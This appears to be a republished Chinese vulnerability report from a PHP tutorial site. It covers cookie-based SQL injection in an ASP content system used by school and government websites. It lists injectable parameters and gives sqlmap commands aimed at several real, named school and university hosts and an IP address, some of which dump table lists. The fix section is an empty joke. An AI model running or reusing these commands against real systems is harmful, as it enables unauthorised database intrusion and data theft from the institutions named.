网站地图    收藏   

子栏目

主页 > 入门引导 > 黑客攻防 >

某系统存在多处Cookie注入 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 某系统存在多处Cookie注入,影响大量学校政府网站 1 借助前人经验:http: wooyun org bugs wooyun-2014-062080 首先发现这个系统很多人用,后来发现存在大量的sql注入可以使用sqlmap进行中转注入。...

某系统存在多处Cookie注入,影响大量学校政府网站

#1.借助前人经验:http://wooyun.org/bugs/wooyun-2014-062080

 首先发现这个系统很多人用,后来发现存在大量的sql注入可以使用sqlmap进行中转注入。

 


注入点:
 

otype.asp?classid=
onews.asp?id=
type_all.asp?classid=
DownloadShow.asp?ID=
search.asp?key=



等一系列注入点,虽然该系统存在防注入系统,但可以通过cookie中转注入吧,然后你可以淫荡得注入了~

#2.枚举5例测试注入点,这里测试第一个注入点为准~

 

C:\Python27\sqlmap>sqlmap.py -u "http://www.fj961.com/otype.asp" --cookie "class
id=1" --level 2


 

02.jpg




 

C:\Python27\sqlmap>sqlmap.py -u "http://121.28.14.48/otype.asp" --cookie "classi
d=2" --level 2 --tables


 

03.jpg




 

C:\Python27\sqlmap>sqlmap.py -u "http://www.olpkeps.com/otype.asp" --cookie "cla
ssid=2" --level 2 --tables


 

04.jpg




 

C:\Python27\sqlmap>sqlmap.py -u "http://www.changqingschool.com/otype.asp" --coo
kie "classid=1" --level 2


 

05.jpg




 

C:\Python27\sqlmap>sqlmap.py -u "http://www1.gdufs.edu.cn/gwkyc/otype.asp" --coo
kie "classid=2" --level 2


 

06.jpg

 

修复方案:

gov的我就不注入了吧

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论